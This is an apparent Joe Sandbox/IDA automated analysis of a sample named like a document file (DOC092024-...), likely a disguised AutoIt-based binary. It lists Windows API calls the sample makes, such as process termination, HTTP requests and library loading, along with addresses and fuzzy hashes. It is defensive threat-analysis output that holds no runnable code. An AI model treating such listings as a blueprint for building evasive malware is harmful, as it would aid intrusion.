                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 1423608774-0
                                                        • Opcode ID: 7fafe1ea5046aebcc6bd206dd61790ef0280a5a83e871b586b8352b98c247913
                                                        • Instruction ID: e1debaafd1595c6d8d761445c84ee9bf2b793944eac16b3e6b0a8f4c685ab8d7
                                                        • Opcode Fuzzy Hash: 7fafe1ea5046aebcc6bd206dd61790ef0280a5a83e871b586b8352b98c247913
                                                        • Instruction Fuzzy Hash: 8A01A932141611EBD7252B64ED48DEB7765FF49703740463AF90392061CBFCAC05CB65
                                                        APIs
                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00711898
                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 007118A0
                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007118AB
                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007118B6
                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 007118BE
                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 007118C6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Virtual
                                                        • String ID:
                                                        • API String ID: 4278518827-0
                                                        • Opcode ID: bf0f7c0f2a9fb1198da46a456c28ffaec6130010a170a49affa465e2fd0b6af8
                                                        • Instruction ID: 78c3826fad99a749cf3dd11a1be2efff2ed2ff1e950f7fb746807b0fbeb13a0e
                                                        • Opcode Fuzzy Hash: bf0f7c0f2a9fb1198da46a456c28ffaec6130010a170a49affa465e2fd0b6af8
                                                        • Instruction Fuzzy Hash: B10167B0902B5ABDE3008F6A8C85B52FFB8FF19394F04411BA15C47A42C7F5A864CBE5
                                                        APIs
                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00758504
                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0075851A
                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00758529
                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00758538
                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00758542
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00758549
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 839392675-0
                                                        • Opcode ID: 0610b285fcf6b8c750a1cef779a93794fae7e9070b199ba4b599dc2213a95b3f
                                                        • Instruction ID: d25318284645fbf05001c3bd6f7ac57775066b08910d0663ba71a08187c32ba2
                                                        • Opcode Fuzzy Hash: 0610b285fcf6b8c750a1cef779a93794fae7e9070b199ba4b599dc2213a95b3f
                                                        • Instruction Fuzzy Hash: BAF09033240158BBE73017529C0EEEF3A7CDFC6B51F00401AFA0192050E7A82E02C6B9
                                                        APIs
                                                        • InterlockedExchange.KERNEL32(?,?), ref: 0075A330
                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 0075A341
                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,007866D3,?,?,?,?,?,0071E681), ref: 0075A34E
                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,007866D3,?,?,?,?,?,0071E681), ref: 0075A35B
                                                          • Part of subcall function 00759CCE: CloseHandle.KERNEL32(?,?,0075A368,?,?,?,007866D3,?,?,?,?,?,0071E681), ref: 00759CD8
                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0075A36E
                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 0075A375
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                        • String ID:
                                                        • API String ID: 3495660284-0
                                                        • Opcode ID: 70fab343d7761550fd0052defcd430fb1673c00aacf3ecc0b1074fc4efc7bce7
                                                        • Instruction ID: 0b2147ad0d3b9e3b69198cf3d50a678910f124af81a9634699487507c5e391ae
                                                        • Opcode Fuzzy Hash: 70fab343d7761550fd0052defcd430fb1673c00aacf3ecc0b1074fc4efc7bce7
                                                        • Instruction Fuzzy Hash: 82F08232141211EBD3212B64ED4CDDB7B79FF8A302B404522F603910B1CBBD9D06CB65
                                                        APIs
                                                        • _memmove.LIBCMT ref: 0071C419
                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,00756653,?,?,00000000), ref: 0071C495
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: FileRead_memmove
                                                        • String ID: Sfu
                                                        • API String ID: 1325644223-2188574825
                                                        • Opcode ID: 3f2f2c649033e477e65f87bbcd709c1477d9c8a537b58ddabb9cb76f78650312
                                                        • Instruction ID: 740ce77ab0a46274373ff1090ea93d5453b91a182990227489ecc9619bde0d10
                                                        • Opcode Fuzzy Hash: 3f2f2c649033e477e65f87bbcd709c1477d9c8a537b58ddabb9cb76f78650312
                                                        • Instruction Fuzzy Hash: CCA1E030A44619EBDF01CFA9C885BADFBB0FF05300F14C199E8659B281D739E9A1DB91
                                                        APIs
                                                          • Part of subcall function 0073010A: std::exception::exception.LIBCMT ref: 0073013E
                                                          • Part of subcall function 0073010A: __CxxThrowException@8.LIBCMT ref: 00730153
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                          • Part of subcall function 0071BBD9: _memmove.LIBCMT ref: 0071BC33
                                                        • __swprintf.LIBCMT ref: 0072D98F
                                                        Strings
                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0072D832
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                        • API String ID: 1943609520-557222456
                                                        • Opcode ID: 5b1a436f337887739a68a6dad0290187d0f87e71b5ef378e4dda9203b1888003
                                                        • Instruction ID: 73e30baac4b2b6f91771e918de04475e6962926da33bbbf7481dfbaeda10702e
                                                        • Opcode Fuzzy Hash: 5b1a436f337887739a68a6dad0290187d0f87e71b5ef378e4dda9203b1888003
                                                        • Instruction Fuzzy Hash: 65914A71108211DFC724FF28D889DAAB7A5FF85710F00495DF496972E2DB28EE45CB92
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0076B4A8
                                                        • CharUpperBuffW.USER32(?,?), ref: 0076B5B7
                                                        • VariantClear.OLEAUT32(?), ref: 0076B73A
                                                          • Part of subcall function 0075A6F6: VariantInit.OLEAUT32(00000000), ref: 0075A736
                                                          • Part of subcall function 0075A6F6: VariantCopy.OLEAUT32(?,?), ref: 0075A73F
                                                          • Part of subcall function 0075A6F6: VariantClear.OLEAUT32(?), ref: 0075A74B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                        • API String ID: 4237274167-1221869570
                                                        • Opcode ID: a6d57bbe2269df798be621e3ec52349b970f7bc46fed64b69517a3bd3ed93481
                                                        • Instruction ID: 7229911d1ff4e72cda78ce8d78d3cd9dd209614ed4ec90e7563ea4b5d2abdaaf
                                                        • Opcode Fuzzy Hash: a6d57bbe2269df798be621e3ec52349b970f7bc46fed64b69517a3bd3ed93481
                                                        • Instruction Fuzzy Hash: A4913A74604301DFC710DF28C48599AB7E4AFC9714F14496DF88ADB3A2DB39E985CB92
                                                        APIs
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                        • _memset.LIBCMT ref: 00755E56
                                                        • GetMenuItemInfoW.USER32(?), ref: 00755E85
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00755F31
                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00755F5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                        • String ID: 0
                                                        • API String ID: 4152858687-4108050209
                                                        • Opcode ID: 088802e31580665026315e73e9f3d487806f5df6b012fc2c75627d5b9bd41eec
                                                        • Instruction ID: 07d16a05850150295c32692d109b4a2587a80d42629653b4752eb75b4827332b
                                                        • Opcode Fuzzy Hash: 088802e31580665026315e73e9f3d487806f5df6b012fc2c75627d5b9bd41eec
                                                        • Instruction Fuzzy Hash: 2B5125316187419BD7249B28C8A5AEBB7E4EF45321F08062DFC91D31E1DBBCCD498792
                                                        APIs
                                                        • _memset.LIBCMT ref: 00755A93
                                                        • GetMenuItemInfoW.USER32 ref: 00755AAF
                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 00755AF5
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,007D18F0,00000000), ref: 00755B3E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem_memset
                                                        • String ID: 0
                                                        • API String ID: 1173514356-4108050209
                                                        • Opcode ID: 2fd4b29d4553cbdb381081f1e6f3619eab8355de3d442add7b3a1f4dccc40863
                                                        • Instruction ID: 545f2037cf28133c3fff3a17cb86d1bf19932b1c044e289c9672f000569c6d1a
                                                        • Opcode Fuzzy Hash: 2fd4b29d4553cbdb381081f1e6f3619eab8355de3d442add7b3a1f4dccc40863
                                                        • Instruction Fuzzy Hash: 4741D2B1204741EFD720DF24C8A8B9AB7E4EF84315F14461DF855972D1D7B8E908CB62
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?,?,?), ref: 00770478
                                                          • Part of subcall function 00717F40: _memmove.LIBCMT ref: 00717F8F
                                                          • Part of subcall function 0071A2FB: _memmove.LIBCMT ref: 0071A33D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove$BuffCharLower
                                                        • String ID: cdecl$none$stdcall$winapi
                                                        • API String ID: 2411302734-567219261
                                                        • Opcode ID: 63e948107078b82335725e0d7258c37dd876aa8a280ec146d373f5fdddeefa4a
                                                        • Instruction ID: e0b749f0401b209c1628117a20799e4a751523e72a37214d66420fa5f8da82be
                                                        • Opcode Fuzzy Hash: 63e948107078b82335725e0d7258c37dd876aa8a280ec146d373f5fdddeefa4a
                                                        • Instruction Fuzzy Hash: 0A31CD7450061AEBCF04EF68C840EEEB3B5FF05350B108A29E826A72D1DB39E945CB80
                                                        APIs
                                                          • Part of subcall function 0071CAEE: _memmove.LIBCMT ref: 0071CB2F
                                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0074C684
                                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0074C697
                                                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 0074C6C7
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 458670788-1403004172
                                                        • Opcode ID: 04b66d720f8d5d266a8b788d6911c684b3793fee632487dc30457a64508b52f3
                                                        • Instruction ID: e9edcf0578033198e93a2883e3942f9726e7c00729c7f0663850e8cbc0921980
                                                        • Opcode Fuzzy Hash: 04b66d720f8d5d266a8b788d6911c684b3793fee632487dc30457a64508b52f3
                                                        • Instruction Fuzzy Hash: 26212371901108BEDB1AEBA8C88ADFFB7B8DF45350B11811AF422E31E1DB7C4D4AD660
                                                        APIs
                                                        • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00764A60
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00764A86
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00764AB6
                                                        • InternetCloseHandle.WININET(00000000), ref: 00764AFD
                                                          • Part of subcall function 007656A9: GetLastError.KERNEL32(?,?,00764A2B,00000000,00000000,00000001), ref: 007656BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                                        • String ID:
                                                        • API String ID: 1951874230-3916222277
                                                        • Opcode ID: c1c9499c24af68741c0dcd82b0cedd4d5666a4a8f79d54820bc0ed7992a307b9
                                                        • Instruction ID: fcc8278c2cbb090eaaf8563c820949da9396158bb9618dc8228c8bbc8e354637
                                                        • Opcode Fuzzy Hash: c1c9499c24af68741c0dcd82b0cedd4d5666a4a8f79d54820bc0ed7992a307b9
                                                        • Instruction Fuzzy Hash: 812192B5540608BFEB11DFA4DC89EBB76ECEB48744F10801AF90696140EA689D059775
                                                        APIs
                                                          • Part of subcall function 0072C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0072C657
                                                          • Part of subcall function 0072C619: GetStockObject.GDI32(00000011), ref: 0072C66B
                                                          • Part of subcall function 0072C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0072C675
                                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00778F69
                                                        • LoadLibraryW.KERNEL32(?), ref: 00778F70
                                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00778F85
                                                        • DestroyWindow.USER32(?), ref: 00778F8D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                         • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                         • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                        • String ID: SysAnimate32
                                                        • API String ID: 4146253029-1011021900
                                                        • Opcode ID: 9ac274636cae5ae04ce2c6543d53f8e6f6edf252fa1abd816699e5289fabdac1
                                                        • Instruction ID: 699e5f2d311c8f6ee54430b267d2dc5615484e0f9b81a62fb67a53688be8510c
                                                        • Opcode Fuzzy Hash: 9ac274636cae5ae04ce2c6543d53f8e6f6edf252fa1abd816699e5289fabdac1
                                                        • Instruction Fuzzy Hash: C7219D71240205AFEF504F64DC48EBB37AAEB593A4F108629FA18D7190CB79DC519762
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0075E392
                                                        • GetVolumeInformationW.KERNEL32(?,?,00000104,?,00000000,00000000,00000000,00000000), ref: 0075E3E6
                                                        • __swprintf.LIBCMT ref: 0075E3FF
                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000,007ADBF0), ref: 0075E43D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume__swprintf
                                                        • String ID: %lu
                                                        • API String ID: 3164766367-685833217
                                                        • Opcode ID: efe76562a4e92f83352a7a45a4dfabb4e5dc102d9d26b3236370f4b4288b7923
                                                        • Instruction ID: eb917efe094b02bd19e38f57332fc71514d2f5d5c70812c95e5378adfa29905c
                                                        • Opcode Fuzzy Hash: efe76562a4e92f83352a7a45a4dfabb4e5dc102d9d26b3236370f4b4288b7923
                                                        • Instruction Fuzzy Hash: C1216D75A40108EFCB10EFA4C889DEE77B9EF89711B108069F909D7291D675DE46CB60
                                                        APIs
                                                          • Part of subcall function 00717E53: _memmove.LIBCMT ref: 00717EB9
                                                          • Part of subcall function 0074D623: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0074D640
                                                          • Part of subcall function 0074D623: GetWindowThreadProcessId.USER32(?,00000000), ref: 0074D653
                                                          • Part of subcall function 0074D623: GetCurrentThreadId.KERNEL32 ref: 0074D65A
                                                          • Part of subcall function 0074D623: AttachThreadInput.USER32(00000000), ref: 0074D661
                                                        • GetFocus.USER32 ref: 0074D7FB
                                                          • Part of subcall function 0074D66C: GetParent.USER32(?), ref: 0074D67A
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0074D844
                                                        • EnumChildWindows.USER32(?,0074D8BA), ref: 0074D86C
                                                        • __swprintf.LIBCMT ref: 0074D886
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmp
